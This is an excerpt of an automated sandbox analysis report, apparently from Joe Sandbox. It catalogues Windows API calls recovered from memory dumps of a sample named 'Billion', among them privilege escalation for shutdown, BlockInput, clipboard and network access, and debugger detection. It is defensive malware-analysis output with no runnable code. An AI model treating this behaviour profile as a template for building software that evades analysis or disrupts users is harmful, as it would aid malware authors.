• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_130000_Billion.jbxd
Similarity
• API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
• String ID: \*.*
• API String ID: 1946585618-1173974218
• Opcode ID: 3aac4612ab86820ca6229beef84c9593e8880cd901f10d361df9e8bb18641a4d
• Instruction ID: f750b4ae67c83c9c1411d245612a165115d94d73e6e30d9fb657b21af6a78760
• Opcode Fuzzy Hash: 3aac4612ab86820ca6229beef84c9593e8880cd901f10d361df9e8bb18641a4d
• Instruction Fuzzy Hash: 25615E3180514DAFCF05EBE0E992DEDB7B9AF25304F2440A9E502B7195EB31AF09CB61
APIs
Memory Dump Source
• Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_130000_Billion.jbxd
Similarity
• API ID: Clipboard$AllocCloseEmptyGlobalOpen
• String ID:
• API String ID: 1737998785-0
• Opcode ID: ec57c18d926dba0c568b0e967694d05c23377fe68e324452347fbc9b2b56b6d1
• Instruction ID: df5f98720677ff6d04ddb11065c59d442c049c1f5d44ad67415447ba80559621
• Opcode Fuzzy Hash: ec57c18d926dba0c568b0e967694d05c23377fe68e324452347fbc9b2b56b6d1
• Instruction Fuzzy Hash: C0419D75604611AFE310CF55E888F15BBE0EF45318F14C0ADE8598BA62C735EC82CB90
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00192010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0019205A
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00192010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00192087
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00192010: GetLastError.KERNEL32 ref: 00192097
                                                                                                                                                                                                                                                                                                          • ExitWindowsEx.USER32(?,00000000), ref: 0019F249
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                                                                                                                                                                          • String ID: $ $@$SeShutdownPrivilege
                                                                                                                                                                                                                                                                                                          • API String ID: 2234035333-3163812486
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • DefDlgProcW.USER32(?,?), ref: 0013233E
                                                                                                                                                                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 00132421
                                                                                                                                                                                                                                                                                                          • SetBkColor.GDI32(?,00000000), ref: 00132434
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Color$Proc
                                                                                                                                                                                                                                                                                                          • String ID: (
                                                                                                                                                                                                                                                                                                          • API String ID: 929743424-2181176062
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,001756C2,?,?,00000000,00000000), ref: 001A3A1E
                                                                                                                                                                                                                                                                                                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,001756C2,?,?,00000000,00000000), ref: 001A3A35
                                                                                                                                                                                                                                                                                                          • LoadResource.KERNEL32(?,00000000,?,?,001756C2,?,?,00000000,00000000,?,?,?,?,?,?,001366CE), ref: 001A3A45
                                                                                                                                                                                                                                                                                                          • SizeofResource.KERNEL32(?,00000000,?,?,001756C2,?,?,00000000,00000000,?,?,?,?,?,?,001366CE), ref: 001A3A56
                                                                                                                                                                                                                                                                                                          • LockResource.KERNEL32(001756C2,?,?,001756C2,?,?,00000000,00000000,?,?,?,?,?,?,001366CE,?), ref: 001A3A65
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                                                                                                                                                          • String ID: SCRIPT
                                                                                                                                                                                                                                                                                                          • API String ID: 3051347437-3967369404
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00191900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00191916
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00191900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00191922
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00191900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00191931
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00191900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00191938
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00191900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0019194E
                                                                                                                                                                                                                                                                                                          • GetLengthSid.ADVAPI32(?,00000000,00191C81), ref: 001920FB
                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00192107
                                                                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 0019210E
                                                                                                                                                                                                                                                                                                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 00192127
                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,00191C81), ref: 0019213B
                                                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00192142
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3008561057-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013B329: _wcslen.LIBCMT ref: 0013B333
                                                                                                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 001AA5BD
                                                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 001AA6D0
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001A42B9: GetInputState.USER32 ref: 001A4310
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001A42B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001A43AB
                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 001AA5ED
                                                                                                                                                                                                                                                                                                          • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 001AA6BA
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                                                                                                                                                                                                                          • String ID: *.*
                                                                                                                                                                                                                                                                                                          • API String ID: 1972594611-438819550
                                                                                                                                                                                                                                                                                                          • Opcode ID: 142783b7ffc84989272165a57fcf17eef195a49c67b777aeb05d78c54b3fbec5
                                                                                                                                                                                                                                                                                                          • Instruction ID: f5386034c0ae5d30111dbcbe7b5d6f1a3f26ad5551af1a016aedf3acd37962e3
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 142783b7ffc84989272165a57fcf17eef195a49c67b777aeb05d78c54b3fbec5
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5541837590020AAFCF15DFA4C849EEEBBB4EF16310F54405AE809A2191EB309E84CF61
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001B3AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 001B3AD7
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001B3AAB: _wcslen.LIBCMT ref: 001B3AF8
                                                                                                                                                                                                                                                                                                          • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 001B22BA
                                                                                                                                                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 001B22E1
                                                                                                                                                                                                                                                                                                          • bind.WSOCK32(00000000,?,00000010), ref: 001B2338
                                                                                                                                                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 001B2343
                                                                                                                                                                                                                                                                                                          • closesocket.WSOCK32(00000000), ref: 001B2372
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1601658205-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: a0a22a04dd7d784eff371e04213ef7291c3d47955a9c0bc59b5e185c2bfbd2f2
                                                                                                                                                                                                                                                                                                          • Instruction ID: 7bb1c4f0a81528d9c4f5ac2ad51e6cc5b6c9985c3d1f06ab22e9646fd34db335
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a0a22a04dd7d784eff371e04213ef7291c3d47955a9c0bc59b5e185c2bfbd2f2
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4551B3B1A00200AFE710AF24C886F6A77E5AB58754F54809CF9459F3D3C775ED418BA1
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 292994002-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 2be523c65a070434cb276a6101b9fb42f86b2d5b698c717e11593531333dbe72
                                                                                                                                                                                                                                                                                                          • Instruction ID: 4099a2705a1ea2df61d039f2befa16724ffa3c73caca4c4f028c04c302634835
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2be523c65a070434cb276a6101b9fb42f86b2d5b698c717e11593531333dbe72
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DD21F1357003108FE7159F26D884F5A7BE5EFB5324F19806CE84A8B252DB71EC42CBA0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • InternetReadFile.WININET(?,?,00000400,?), ref: 001AD8CE
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000), ref: 001AD92F
                                                                                                                                                                                                                                                                                                          • SetEvent.KERNEL32(?,?,00000000), ref: 001AD943
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ErrorEventFileInternetLastRead
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 234945975-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,001746AC), ref: 0019E482
                                                                                                                                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 0019E491
                                                                                                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0019E4A2
                                                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0019E4AE
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2695905019-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: LocalTime
                                                                                                                                                                                                                                                                                                          • String ID: %.3d$X64
                                                                                                                                                                                                                                                                                                          • API String ID: 481472006-1077770165
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00162A8A
                                                                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00162A94
                                                                                                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00162AA1
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0015014B: __CxxThrowException@8.LIBVCRUNTIME ref: 001509D8
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0015014B: __CxxThrowException@8.LIBVCRUNTIME ref: 001509F5
                                                                                                                                                                                                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0019205A
                                                                                                                                                                                                                                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00192087
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00192097
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 577356006-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,0015502E,?,001F98D8,0000000C,00155185,?,00000002,00000000), ref: 00155079
                                                                                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,0015502E,?,001F98D8,0000000C,00155185,?,00000002,00000000), ref: 00155080
                                                                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00155092
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 891c2fb197bf4cb6f606c42220555901a1d62c88a59a6b0febe8eb1b2e314a98
                                                                                                                                                                                                                                                                                                          • Instruction ID: 86dc2f68dd8afaeedcde5c0f2bf5abace7eebb77f619f0145a2953fa30e5e259
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 891c2fb197bf4cb6f606c42220555901a1d62c88a59a6b0febe8eb1b2e314a98
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 63E0B671000588EFCF216F54ED19E583F6AEB60386F154024FC599A961DB35DD96CAC0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetUserNameW.ADVAPI32(?,?), ref: 0018E664
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: NameUser
                                                                                                                                                                                                                                                                                                          • String ID: X64
                                                                                                                                                                                                                                                                                                          • API String ID: 2645101109-893830106
                                                                                                                                                                                                                                                                                                          • Opcode ID: b184e403530be8e0f59c1fa94475936ea99b859b5095da2fea10fefb5f07e8d6
                                                                                                                                                                                                                                                                                                          • Instruction ID: 87bf8d009db0f8aa81dccb616572ce9440f3bd9ca86332dcd703a7dddca9436a
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b184e403530be8e0f59c1fa94475936ea99b859b5095da2fea10fefb5f07e8d6
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7D0C9F480112DEACB84CB50EC88DD977BCBB04304F120665F106E2000D73096498F10
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,001B52EE,?,?,00000035,?), ref: 001A4229
                                                                                                                                                                                                                                                                                                          • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,001B52EE,?,?,00000035,?), ref: 001A4239
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ErrorFormatLastMessage
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3479602957-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 6f5b5bdf703ea622a4c9473fb60681856b30fac121b69ee5c552537fc63d6520
                                                                                                                                                                                                                                                                                                          • Instruction ID: 4612bd2cb24363687d6e22fa8d5f284a168c29c808536b81f64e2ed94ca3cd58
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f5b5bdf703ea622a4c9473fb60681856b30fac121b69ee5c552537fc63d6520
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7EF0E5756002246AE7201665AC4DFEB7A6DFFC5761F000176F509D2281DA70D940C6B0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00191B48), ref: 00191A20
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,00191B48), ref: 00191A35
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 81990902-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: c9d81d00a73570fe281f3fdbc708d8d39a9992b4b6670f32b79f7384394212bb
                                                                                                                                                                                                                                                                                                          • Instruction ID: 184cdbab5b9af4d8516b93b431a33abfe3e6dd64d571175d16cde0a634e1110f
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c9d81d00a73570fe281f3fdbc708d8d39a9992b4b6670f32b79f7384394212bb
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AAE01A72004A10AEE7262B50FC05E727BA9FB04351F14882DB8A584470DBA2AC91DA10
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • BlockInput.USER32(00000001), ref: 001AF51A
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
